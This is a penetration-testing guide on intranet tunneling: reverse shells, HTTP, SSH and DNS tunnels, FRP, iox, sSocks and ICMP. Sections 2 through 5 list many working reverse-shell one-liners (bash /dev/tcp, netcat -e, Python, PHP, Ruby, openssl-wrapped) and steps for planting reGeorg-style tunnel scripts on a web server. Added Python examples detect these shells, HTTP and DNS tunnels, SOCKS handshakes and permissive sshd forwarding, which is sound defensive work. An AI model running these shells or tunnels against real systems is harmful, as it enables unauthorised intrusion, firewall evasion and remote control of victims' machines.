
Intranet Tunneling and Penetration

1 Scenario Overview

1.1 Related Concepts

Intranet penetration means using tunneling techniques to find a protocol the firewall allows, hide the tunnel inside otherwise normal traffic, bypass the firewall's blocking, and reach a target network that is otherwise unreachable.

Encapsulated packets are routed between the two endpoints of the tunnel across the public Internet. The logical path the encapsulated packets follow while crossing the public network is called the tunnel. Once they reach the tunnel endpoint, the packets are unpacked and forwarded to their final destination. Note that tunneling refers to the whole process: encapsulating the data, transmitting it, and unpacking it.

The two main functions of a tunnel protocol are evading firewalls and encrypting network traffic.

Common tunnels are listed as follows:

Application layer: SSH, HTTP, HTTPS, DNS.

Transport layer: TCP, UDP, regular port forwarding.

Network layer: IPv6, ICMP, GRE.

1.2 Forward Proxy and Reverse Proxy

In a forward proxy, the proxy and the client are on the same LAN, and the proxy is transparent to the server.

In a reverse proxy, the proxy and the server are on the same LAN, and the proxy is transparent to the client. In both cases the proxy does the same job, sending requests and receiving responses on someone else's behalf; structurally the two setups are mirror images of each other, which is why the first is called a forward proxy and the second a reverse proxy.

1.2.1 Forward Proxy

Lhost - proxy - Rhost

To reach Rhost, Lhost sends a request to the proxy and names Rhost as the target. The proxy forwards the request to Rhost and returns the result to Lhost. Put simply, a forward proxy accesses Rhost on our behalf.

1.2.2 Reverse Proxy

Lhost --- proxy --- firewall --- Rhost

In contrast to a forward proxy, Lhost only sends an ordinary request to the proxy. The proxy decides by itself which host behind the firewall should handle the request, forwards it there, and passes the returned data back to Lhost. The benefit is that this gets through firewalls that only allow the proxy's own traffic in and out.

1.3 Forwarding Scenarios

1.3.1 Common Scenarios

Security operations: bypass the bastion host or firewall to manage intranet servers remotely.

Intranet penetration: bypass the bastion host or firewall to attack intranet servers.

Typical positions of the target in the network:

The target sits on the network boundary and can reach both the internal and the external network. The boundary host has no firewall, and all of its ports are exposed to the Internet. This scenario is rare in practice.

The target sits in the intranet and is allowed out of the network only over specific application-layer protocols (such as HTTP, SSH, DNS) and other application-layer ports (3389, 22, 445, 53, 80, 443, etc.).

The target sits in the intranet and cannot reach the external network, but can reach the boundary host. The firewall policy prevents the external network from directly reaching sensitive intranet ports (3389, 22, 445, etc.).

Common forwarding methods:

Reverse port forwarding

Reverse shell

SOCKS proxy

1.3.2 Firewall Rules

Inbound from the Internet:

Specific port mapping, e.g. 80:80

Outbound to the Internet:

ICMP

Specific allowed protocols (HTTP, DNS, SSH, RDP)

Specific allowed ports (try the mainstream ports first, then the full port range)

1.3.3 Connectivity Testing

Before building a tunnel, first check whether the target machine can reach the Internet at all and which protocols get out. Doing this by hand is tedious, so the tool below can be used instead; it can run in batch together with lateral-movement tools such as wmiexec and psexec. It echoes the intranet IP address and computer name back through dnslog, which quickly identifies which intranet machines have outbound access.

Tool: https://github.com/uknowsec/SharpNetCheck

Usage:

SharpNetCheck -dns -host ceye.io
SharpNetCheck -http -host/ip ceye.io
SharpNetCheck -all -host ceye.io

2 Reverse Shells

2.1 Bash

2.1.1 Bash TCP

bash -i >& /dev/tcp/ip/port 0>&1
bash -i > /dev/tcp/ip/port 0<&1 2>&1
exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done
exec /bin/sh 0</dev/tcp/ip/port 1>&0 2>&0
0<&196;exec 196<>/dev/tcp/ip/port; sh <&196 >&196 2>&196

2.1.2 Bash UDP

Victim:

sh -i >& /dev/udp/10.0.0.1/4242 0>&1

Listener:

nc -u -lvp 4242

2.2 Reverse Shells from Applications

2.2.1 netcat

ncat ip port -e /bin/bash
nc -e /bin/bash ip port
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f
rm -f x; mknod x p && nc ip port 0<x | /bin/bash 1>x

2.2.2 python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# IPv6 variant (uses pty, so Unix only)
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2:125c",port,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'

Tips for the Python environment

Upgrade to an interactive shell: python -c 'import pty;pty.spawn("/bin/bash")'

Fully interactive shell:

$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
$ stty raw -echo
$ fg
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color   # optional

2.2.3 PHP

php -r '$sock=fsockopen("ip",port);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$s=fsockopen("ip",port);$proc=proc_open("/bin/sh -i", array(0=>$s, 1=>$s, 2=>$s),$pipes);'
php -r '$s=fsockopen("ip",port);shell_exec("/bin/sh -i <&3 >&3 2>&3");'

2.2.4 Ruby

ruby -rsocket -e'f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# windows only
ruby -rsocket -e 'c=TCPSocket.new("ip","port"); while(cmd=c.gets); IO.popen(cmd,"r"){|io|c.print io.read}end'

2.3 Encrypting Traffic with openssl

# Generate a key pair and self-signed certificate on the VPS
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

# Listen for the reverse shell on the VPS
openssl s_server -quiet -key key.pem -cert cert.pem -port 4433

# On the target (Linux), wrap the shell's traffic in TLS with openssl
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect IP:port > /tmp/s; rm /tmp/s

# Windows
openssl s_client -quiet -connect [ip]:[port1] | cmd.exe | openssl s_client -quiet -connect [ip]:[port2]

# The command above reads commands from [ip]:[port1], passes them to cmd.exe for execution,
# and sends the output to [ip]:[port2], so two s_server instances must run on the VPS:

# Send commands to cmd.exe through port1
openssl s_server -quiet -key key.pem -cert cert.pem -port [port1]

# Receive on port2 the output of the commands sent via port1
openssl s_server -quiet -key key.pem -cert cert.pem -port [port2]
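The one-liners in sections 2.1 to 2.3 share a few fixed shapes: a /dev/tcp or /dev/udp redirection, nc with -e, a named pipe feeding a shell, a socket wired onto a shell's file descriptors, and openssl s_client piped into a shell. The following Python is an added example, not part of the original post, showing how a defender can flag those shapes in process-creation records; the record format (pid, user and command line separated by tabs) and the sample records are constructed for the example.

```python
import re

# Signatures for the reverse-shell shapes listed in sections 2.1 to 2.3.
# Each entry is a rule name and a regex applied to the full process command line.
RULES = [
    ("bash-devtcp", re.compile(r"/dev/(tcp|udp)/")),
    ("netcat-exec", re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s")),
    ("fifo-pipe-shell", re.compile(r"\b(mkfifo|mknod)\b.*\b(nc|ncat|netcat|openssl)\b")),
    ("python-socket-dup2", re.compile(r"socket\.socket\(.*dup2\(.*(subprocess|pty)")),
    ("php-fsockopen-shell", re.compile(r"fsockopen\(.*(exec|proc_open|shell_exec|popen)\(")),
    ("ruby-tcpsocket-exec", re.compile(r"TCPSocket\.(open|new)\(.*(exec|popen)")),
    ("openssl-client-shell", re.compile(
        r"openssl\s+s_client\b.*\|\s*(/bin/)?(sh|bash|cmd\.exe)\b"
        r"|(/bin/)?(sh|bash)\b.*\|\s*openssl\s+s_client\b")),
]


def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def parse_line(line):
    """Parse one constructed process-creation record: 'pid<TAB>user<TAB>cmdline'."""
    pid, user, cmd = line.rstrip("\n").split("\t", 2)
    return {"pid": int(pid), "user": user, "cmd": cmd}


def scan_log(lines):
    """Return the records whose command line matches at least one rule."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        matched = classify(rec["cmd"])
        if matched:
            rec["rules"] = matched
            hits.append(rec)
    return hits


# Constructed records: a mix of the section's one-liners and ordinary admin activity.
SAMPLE_LOG = [
    "4101\twww-data\tbash -i >& /dev/tcp/203.0.113.10/4444 0>&1",
    "4102\twww-data\tcurl -s https://updates.example.internal/health",
    "4103\tapp\tnc -e /bin/bash 203.0.113.10 4444",
    "4104\tapp\trm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 203.0.113.10 4444 >/tmp/f",
    "4105\twww-data\tpython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect((\"203.0.113.10\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
    "p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    "4106\twww-data\tphp -r '$s=fsockopen(\"203.0.113.10\",4444);$p=proc_open(\"/bin/sh -i\", array(0=>$s,1=>$s,2=>$s),$pipes);'",
    "4107\tdeploy\tssh -L 8866:192.168.10.3:23 -fN 192.168.10.2",
    "4108\twww-data\tmkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 203.0.113.10:4433 > /tmp/s; rm /tmp/s",
    "4109\tbackup\ttar czf /var/backups/www.tgz /var/www",
]


def main():
    for hit in scan_log(SAMPLE_LOG):
        print(f"pid={hit['pid']} user={hit['user']} rules={hit['rules']}")


if __name__ == "__main__":
    main()
```

The rules are deliberately narrow so that ordinary uses of nc, ssh and openssl (the curl, ssh -L and tar records above) stay quiet; in production the same logic would read from auditd execve records or an EDR process feed rather than the constructed list.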

2.4 All in One

The following websites generate reverse shell commands automatically:

https://mrxn.net/reverse_shell.php

https://ares-x.com/tools/reverse-shell/

An online encoder that keeps special characters from being filtered; it can also be used for java.lang.Runtime.exec() payloads:

http://www.jackson-t.ca/runtime-exec-payloads.html

3 Application-Layer Tunnels

3.1 HTTP Tunnels

3.1.1 reGeorg

Tool address: https://github.com/sensepost/reGeorg (the nosocket version is recommended)

How to use:

Upload the tunnel file to the web server.

Run the proxy: python reGeorgSocksProxy.py -p 8080 -u http://ip:port/tunnel/tunnel.jsp

3.1.2 Neo-reGeorg

Tool address: https://github.com/L-codes/Neo-reGeorg

Neo-reGeorg is a refactoring of reGeorg with the following goals:

Improve the security of the tunnel connection

Improve usability and avoid signature-based detection

Improve the confidentiality of the transmitted content

Cope with more network environments

How to use:

Set a password and generate tunnel.(aspx|ashx|jsp|jspx|php), then upload it to the web server: python3 neoreg.py generate -k password

Use neoreg.py to connect to the web server and open a local socks5 proxy: python3 neoreg.py -k password -u http://xx/tunnel.php

Notice

If your tools, such as nmap, do not support socks5 proxy settings, use proxychains or similar.

3.1.3 Others

Tunna

# -u Address of the remote proxy script
# -l Local listening port
# -r Remote port to map
# -v Verbose output
# -a Host address the remote end of the proxy connects to
python proxy.py -u http://ip/conn.aspx -l 1080 -v
python proxy.py -u http://ip/conn.aspx -l 5555 -r 8080 -s -v -n

abptts

pystinger
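A reGeorg-style tunnel shows up in the web server's access log as a dense stream of requests from one client to one server-side script, because every tunnelled TCP segment becomes an HTTP request. The following Python is an added example (not code from reGeorg, Neo-reGeorg or Tunna) that groups combined-format access-log lines by client and path and flags the groups whose request count, POST ratio and rate look like a tunnel endpoint; the thresholds and the sample log lines are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Combined log format (Apache/nginx default); the query string is dropped from the path.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_access_log(lines):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    records = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
        rec["path"] = rec["path"].split("?", 1)[0]
        records.append(rec)
    return records


def find_http_tunnels(records, min_requests=20, min_post_ratio=0.8, min_rate=1.0):
    """Flag (client, path) pairs that look like an HTTP tunnel endpoint.

    The thresholds are constructed starting points: a tunnel produces many
    POSTs to a single script at a steady, high rate from one client.
    """
    groups = defaultdict(list)
    for rec in records:
        groups[(rec["client"], rec["path"])].append(rec)
    flagged = []
    for (client, path), recs in groups.items():
        n = len(recs)
        if n < min_requests:
            continue
        post_ratio = sum(r["method"] == "POST" for r in recs) / n
        span = (max(r["ts"] for r in recs) - min(r["ts"] for r in recs)).total_seconds()
        rate = n / (span + 1.0)  # +1 so a burst inside one second still yields a rate
        if post_ratio >= min_post_ratio and rate >= min_rate:
            flagged.append({"client": client, "path": path, "requests": n,
                            "post_ratio": round(post_ratio, 2), "rate_per_s": round(rate, 2)})
    return flagged


def _line(client, ts, method, path, status, size):
    return f'{client} - - [{ts}] "{method} {path} HTTP/1.1" {status} {size} "-" "Mozilla/5.0"'


# Constructed access log: ordinary browsing from 10.0.0.23, then a burst of 40 POSTs
# within ten seconds to /tunnel/tunnel.jsp (the path from section 3.1.1) from 203.0.113.10.
SAMPLE_LOG = [
    _line("10.0.0.23", f"08/Jan/2021:22:{40 + i // 10:02d}:{(i * 7) % 60:02d} +0000", "GET", path, 200, 5120)
    for i, path in enumerate(["/index.html", "/static/app.js", "/login"] * 5)
] + [
    _line("203.0.113.10", f"08/Jan/2021:22:45:{10 + i // 4:02d} +0000", "POST", "/tunnel/tunnel.jsp", 200, 23)
    for i in range(40)
]


def main():
    for hit in find_http_tunnels(parse_access_log(SAMPLE_LOG)):
        print(hit)


if __name__ == "__main__":
    main()
```

Because Neo-reGeorg is designed to avoid fixed signatures in its requests, a volume-and-rate heuristic like this one is more durable than matching on request contents; the trade-off is that a busy legitimate API endpoint needs to be whitelisted by path.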

3.2 SSH Tunnels

Reference: https://3nd.xyz/AD-Pentest/AD-Pentest-Hidden-Tunnel/

3.2.1 Local Port Forwarding

Enables port forwarding on the local host.

Example: run on the attacker's host (the VPS makes the outbound connection)

ssh -L 8866:192.168.10.3:23 -fN 192.168.10.2

3.2.2 Remote Port Forwarding

Enables port forwarding on the remote host.

Example: run on the bastion host (the boundary host connects back)

ssh -R 8866:192.168.10.3:23 -fN 192.168.10.1

3.2.3 Dynamic Forwarding - SOCKS

Enables dynamic forwarding on the local host; configure a proxy to use it.

Example: run on the attacker's host

ssh -D 1100 -fN 192.168.10.2
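All three ssh forms above depend on the sshd on the hop allowing forwarding, which it does by default. The following Python is an added example, not part of the original post, that parses an sshd_config fragment and reports the forwarding-related directives (AllowTcpForwarding, GatewayPorts, PermitTunnel, PermitOpen) as sshd would apply them, including Match blocks that override the global values; the two config fragments are constructed for the example, and the defaults are those documented in sshd_config(5).

```python
# Defaults from sshd_config(5) for the directives that govern tunnelling.
DEFAULTS = {
    "allowtcpforwarding": "yes",   # -L, -R and -D all require this
    "gatewayports": "no",          # whether -R ports bind on non-loopback addresses
    "permittunnel": "no",          # tun(4) layer-2/3 tunnels (ssh -w)
    "permitopen": "any",           # destinations a -L forward may target
}


def parse_sshd_config(text):
    """Split sshd_config into global settings and a list of Match blocks.

    sshd keeps the first value of a repeated directive, hence setdefault.
    """
    global_settings, blocks, current = {}, [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            current = {"criteria": value, "settings": {}}
            blocks.append(current)
            continue
        target = current["settings"] if current is not None else global_settings
        target.setdefault(key, value)
    return global_settings, blocks


def effective(settings, base):
    """Resolve the tunnelling directives, inheriting anything unset from base."""
    return {k: settings.get(k, base[k]) for k in base}


def check(eff, scope):
    """Return findings for one resolved scope (global or one Match block)."""
    findings = []
    tcp = eff["allowtcpforwarding"].lower()
    if tcp != "no":
        findings.append(f"{scope}: AllowTcpForwarding {tcp}: clients can open -L/-R/-D tunnels")
        if tcp in ("yes", "local") and eff["permitopen"].lower() == "any":
            findings.append(f"{scope}: PermitOpen unrestricted: -L may target any host:port")
    if eff["gatewayports"].lower() != "no":
        findings.append(f"{scope}: GatewayPorts {eff['gatewayports']}: -R ports reachable from other hosts")
    if eff["permittunnel"].lower() != "no":
        findings.append(f"{scope}: PermitTunnel {eff['permittunnel']}: layer-2/3 tun tunnels allowed")
    return findings


def audit_config(text):
    """Findings for the global scope plus every Match block, in file order."""
    global_settings, blocks = parse_sshd_config(text)
    global_eff = effective(global_settings, DEFAULTS)
    findings = check(global_eff, "global")
    for block in blocks:
        findings += check(effective(block["settings"], global_eff), f"Match {block['criteria']}")
    return findings


# Constructed fragment that leaves sshd's permissive forwarding defaults in place.
WEAK_CONFIG = """\
Port 22
PermitRootLogin no
GatewayPorts yes
# AllowTcpForwarding is not set, so sshd's default (yes) applies

Match User deploy
    AllowTcpForwarding no
    PermitTunnel no
"""

# Constructed fragment that turns forwarding off globally and re-enables only
# a pinned local forward for one account.
HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
AllowTcpForwarding no
GatewayPorts no
PermitTunnel no

Match User deploy
    AllowTcpForwarding local
    PermitOpen 10.0.0.5:5432
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_config(cfg))
```

Note that the Match block in WEAK_CONFIG still inherits GatewayPorts yes from the global scope, which is exactly the kind of inheritance that is easy to miss when reading the file by hand.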

3.3 DNS Tunnels

Tool: dnscat2

Precompiled builds: https://downloads.skullsecurity.org/dnscat2/

3.3.1 Configure DNS Records

Add an A record named ns1 pointing to the VPS IP address.

Add an NS record for any subdomain, pointing to ns1.yourdomain.com.

3.3.2 Install the dnscat2 Server

apt-get install gem
apt-get install ruby-dev
apt-get install libpq-dev
apt-get install ruby-bundler
apt-get install git
git clone https://github.com/iagox86/dnscat2
cd dnscat2/server
bundle install

3.3.3 Start the Server

ruby ./dnscat2.rb dnscat.yuming.com -e open -c mima --no-cache

3.3.4 Start the Client

# Test whether the client can reach the server
dnscat-client.exe --ping dnscat.yuming.com

# Connect
dnscat-client.exe --dns domain=dnscat.yuming.com --secret mima
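dnscat2 carries its data in the query names themselves, so the zone the tunnel uses receives a stream of long, high-entropy, never-repeating subdomains, often with TXT, CNAME or MX query types. The following Python is an added example, not part of the original post or of dnscat2, that scores each zone seen in a DNS query log on those properties; the log format (timestamp, client, query name, type), the thresholds and the sample queries are constructed for the example, and the zone is taken to be the last two labels of the name, which is a simplification.

```python
import hashlib
import math
from collections import defaultdict

# Query types that can carry a larger answer and are favoured by DNS tunnels.
DATA_QUERY_TYPES = {"TXT", "CNAME", "MX", "NULL"}


def shannon_entropy(s):
    """Bits per character of the string s (0.0 for an empty string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Return (zone, prefix); the zone is the last two labels (a simplification)."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return None, None
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def parse_query_log(lines):
    """Lines are 'timestamp client qname qtype' separated by whitespace."""
    records = []
    for line in lines:
        parts = line.split()
        if len(parts) != 4:
            continue
        records.append({"ts": parts[0], "client": parts[1], "qname": parts[2], "qtype": parts[3].upper()})
    return records


def score_zones(records, min_queries=10):
    """Per zone: query count, whether it looks tunnelled, and the reasons."""
    stats = defaultdict(lambda: {"queries": 0, "prefixes": set(), "prefix_len": 0,
                                 "entropy": 0.0, "data_types": 0})
    for rec in records:
        zone, prefix = split_name(rec["qname"])
        if zone is None:
            continue
        z = stats[zone]
        z["queries"] += 1
        z["prefixes"].add(prefix)
        z["prefix_len"] += len(prefix)
        z["entropy"] += shannon_entropy(prefix.replace(".", ""))
        if rec["qtype"] in DATA_QUERY_TYPES:
            z["data_types"] += 1
    results = {}
    for zone, z in stats.items():
        n = z["queries"]
        if n < min_queries:
            continue
        avg_len = z["prefix_len"] / n
        avg_entropy = z["entropy"] / n
        unique_ratio = len(z["prefixes"]) / n
        data_ratio = z["data_types"] / n
        reasons = []
        if avg_len >= 30:
            reasons.append(f"average subdomain length {avg_len:.1f}")
        if avg_entropy >= 3.5:
            reasons.append(f"average entropy {avg_entropy:.2f} bits/char")
        if unique_ratio >= 0.9:
            reasons.append(f"{unique_ratio:.0%} of queries use a new subdomain")
        if data_ratio >= 0.5:
            reasons.append(f"{data_ratio:.0%} TXT/CNAME/MX/NULL queries")
        # Two independent signals are required so a single CDN-style long label is not enough.
        results[zone] = {"queries": n, "suspicious": len(reasons) >= 2, "reasons": reasons}
    return results


def _tunnel_prefix(i):
    """Constructed hex-encoded chunks, the shape dnscat2 query names take."""
    h = hashlib.sha256(f"constructed-{i}".encode()).hexdigest()
    return f"{h[:24]}.{h[24:48]}.dnscat"


# Constructed log: normal lookups under example.com, then twelve tunnel-style
# TXT queries under yuming.com (the placeholder domain used in section 3.3.3).
SAMPLE_LOG = [
    f"2021-01-08T22:45:{i:02d}Z 10.0.0.23 {name}.example.com A"
    for i, name in enumerate(["www", "mail", "cdn"] * 4)
] + [
    f"2021-01-08T22:46:{i:02d}Z 10.0.0.23 {_tunnel_prefix(i)}.yuming.com TXT"
    for i in range(12)
]

if __name__ == "__main__":
    for zone, result in score_zones(parse_query_log(SAMPLE_LOG)).items():
        print(zone, result)
```

Because the client in section 3.3.4 polls the server continuously even when idle, query volume per zone over time is a further signal worth adding; the example keeps to per-name properties so that it works on an unordered log extract.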

4 Transport Layer

SOCKS4 supports TCP-based protocols such as telnet, FTP and HTTP.

SOCKS5 supports both TCP and UDP and adds authentication.

4.1 FRP

frp is written in Go and is cross-platform: download the binaries for the relevant platform and run them. Tool address: https://github.com/fatedier/frp

Write the configuration files, then start the server with ./frps -c ./frps.ini and the client with ./frpc -c ./frpc.ini.

The server runs on a host with a public IP; the client runs on the pivot host we already control. Both ends need a configuration file.

4.1.1 Server

[common]
# frp server port
bind_port=7000
# dashboard port
dashboard_port=8888
# frp server password
token=123456
# dashboard default account and password
dashboard_user=admin
dashboard_pwd=admin

Start frp: frps -c frps.ini

4.1.2 Client

[common]
server_addr=VPS IP
server_port=7000
# must match the token on the VPS
token=123456

[ssh]
type=tcp
local_ip=127.0.0.1
local_port=22
# port opened on the VPS; it must not collide with bind_port (7000), which frps already occupies
remote_port=6000
use_encryption=true
use_compression=true

4.2 iox

iox is a port-forwarding and intranet proxy tool similar in function to lcx/ew, but better than either.

Tool address: https://github.com/EddieIvan01/iox

4.2.1 Port Forwarding

# Port forwarding: forward between local 8888 and local 9999
./iox fwd -l 8888 -l 9999
# Port forwarding: forward traffic from local 8888 to 1.1.1.1:9999
./iox fwd -l 8888 -r 1.1.1.1:9999
# Connect to 1.1.1.1:8888 and 1.1.1.1:9999 and forward between the two connections
./iox fwd -r 1.1.1.1:8888 -r 1.1.1.1:9999

4.2.2 Proxy

# Start a Socks5 service locally on 0.0.0.0:1080 - forward proxy
./iox proxy -l 1080

# Reverse proxy
# Start a Socks5 service on the compromised machine and forward it to the public VPS
./iox proxy -r 1.1.1.1:9999
# On the VPS, forward 0.0.0.0:9999 to 0.0.0.0:1080
# These two commands must be used as a pair, because they carry a simple protocol that controls the back connection
./iox proxy -l 9999 -l 1080   # note that the order of the two ports matters
# Then connect to the intranet host through
# socks5://1.1.1.1:1080
proxychains rdesktop 192.168.0.100:3389

4.3 sSocks

sSocks is a set of socks proxy tools: it can run a socks proxy service, supports socks5 authentication, IPv6 and UDP, and provides a reverse socks proxy, i.e. it turns a remote computer into a socks proxy server that connects back to the local machine, which greatly simplifies intranet penetration testing.

Tool address: http://sourceforge.net/projects/ssocks/

Forward proxy

./ssocksd --bind 192.168.172.131 --port 1080

Reverse proxy

# Attacker machine: listen on port 6020 and forward to 6010
./rcsocks -l 6020 -p 6010 -vv
# Victim: connect back to port 6010 on the proxy host
./rssocks -s <attacker IP>:6010 -vv
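Every proxy in this section (ssh -D, iox proxy, ssocksd, rssocks and ports published through frp) speaks SOCKS4 or SOCKS5, and the first bytes a client sends are fixed by the protocol. The following Python is an added example, not part of the original post or of any of those tools, that recognises a SOCKS5 greeting, a SOCKS5 CONNECT/BIND/UDP-ASSOCIATE request and a SOCKS4/4a request from the first client payload of a flow, so that proxies listening on unexpected ports can be spotted in captured traffic; the sample flows are constructed for the example.

```python
import ipaddress
import struct

SOCKS5_METHODS = {0x00: "no-auth", 0x01: "gssapi", 0x02: "username/password", 0xFF: "no-acceptable"}
SOCKS_COMMANDS = {0x01: "CONNECT", 0x02: "BIND", 0x03: "UDP-ASSOCIATE"}


def parse_socks5_greeting(p):
    """VER=5, NMETHODS, METHODS[NMETHODS] (RFC 1928 client greeting)."""
    if len(p) < 2 or p[0] != 0x05:
        return None
    n = p[1]
    if n == 0 or len(p) != 2 + n:
        return None
    return {"version": 5, "kind": "greeting",
            "methods": [SOCKS5_METHODS.get(m, f"0x{m:02x}") for m in p[2:]]}


def parse_socks5_request(p):
    """VER=5, CMD, RSV=0, ATYP, DST.ADDR, DST.PORT (sent after method negotiation)."""
    if len(p) < 4 or p[0] != 0x05 or p[1] not in SOCKS_COMMANDS or p[2] != 0x00:
        return None
    atyp = p[3]
    if atyp == 0x01 and len(p) == 10:                       # IPv4
        host = str(ipaddress.IPv4Address(p[4:8]))
        port = struct.unpack("!H", p[8:10])[0]
    elif atyp == 0x03 and len(p) >= 5 and len(p) == 7 + p[4]:  # length-prefixed domain name
        host = p[5:5 + p[4]].decode("ascii", "replace")
        port = struct.unpack("!H", p[5 + p[4]:7 + p[4]])[0]
    elif atyp == 0x04 and len(p) == 22:                     # IPv6
        host = str(ipaddress.IPv6Address(p[4:20]))
        port = struct.unpack("!H", p[20:22])[0]
    else:
        return None
    return {"version": 5, "kind": "request", "command": SOCKS_COMMANDS[p[1]], "host": host, "port": port}


def parse_socks4_request(p):
    """VN=4, CD, DSTPORT, DSTIP, NUL-terminated USERID; SOCKS4a appends a NUL-terminated hostname."""
    if len(p) < 9 or p[0] != 0x04 or p[1] not in (0x01, 0x02):
        return None
    port = struct.unpack("!H", p[2:4])[0]
    ip, rest = p[4:8], p[8:]
    nul = rest.find(b"\x00")
    if nul < 0:
        return None
    userid, tail = rest[:nul].decode("ascii", "replace"), rest[nul + 1:]
    if ip[:3] == b"\x00\x00\x00" and ip[3] != 0:  # SOCKS4a marker 0.0.0.x: hostname follows
        nul = tail.find(b"\x00")
        if nul < 0:
            return None
        host, tail = tail[:nul].decode("ascii", "replace"), tail[nul + 1:]
    else:
        host = str(ipaddress.IPv4Address(ip))
    if tail:  # trailing bytes mean this is not a well-formed SOCKS4 request
        return None
    return {"version": 4, "kind": "request", "command": SOCKS_COMMANDS[p[1]],
            "host": host, "port": port, "userid": userid}


def identify_socks(payload):
    """Return the parsed handshake message, or None if the bytes are not SOCKS."""
    for parser in (parse_socks5_greeting, parse_socks5_request, parse_socks4_request):
        result = parser(payload)
        if result is not None:
            return result
    return None


def scan_flows(flows):
    """Return (dst_ip, dst_port, parsed) for every flow whose first payload is SOCKS."""
    found = []
    for dst_ip, dst_port, payload in flows:
        parsed = identify_socks(payload)
        if parsed is not None:
            found.append((dst_ip, dst_port, parsed))
    return found


# Constructed first client payloads of five TCP flows: (dst_ip, dst_port, bytes).
SAMPLE_FLOWS = [
    ("10.0.0.5", 443, b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4"),                     # TLS ClientHello
    ("10.0.0.5", 1080, b"\x05\x01\x00"),                                             # SOCKS5 greeting, no-auth only
    ("10.0.0.5", 1080, b"\x05\x01\x00\x01\xc0\xa8\x00\x64\x0d\x3d"),                 # SOCKS5 CONNECT 192.168.0.100:3389
    ("10.0.0.5", 8080, b"\x04\x01\x00\x16\x00\x00\x00\x01anon\x00192.168.10.3\x00"),  # SOCKS4a CONNECT 192.168.10.3:22
    ("10.0.0.5", 80, b"GET / HTTP/1.1\r\nHost: 10.0.0.5\r\n\r\n"),                   # plain HTTP
]

if __name__ == "__main__":
    for dst_ip, dst_port, parsed in scan_flows(SAMPLE_FLOWS):
        print(dst_ip, dst_port, parsed)
```

A SOCKS5 greeting that offers only no-auth, as in the second flow, is what an unauthenticated proxy such as ssh -D or iox proxy accepts; seeing that handshake on a host that is not supposed to run a proxy, or on a port such as 8080 that is meant for HTTP, is the finding.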

5 Network Layer

5.1 ICMP Tunnel

Tool name: ICMPSH

5.1.1 Server

The server must stop answering ICMP echo requests itself: sysctl -w net.ipv4.icmp_echo_ignore_all=1

Install and start the server:

apt-get install python-impacket
python icmpsh_m.py <local IP> <target public IP>

5.1.2 Client

icmpsh.exe -t <target IP> -d 500 -b 30 -s 128
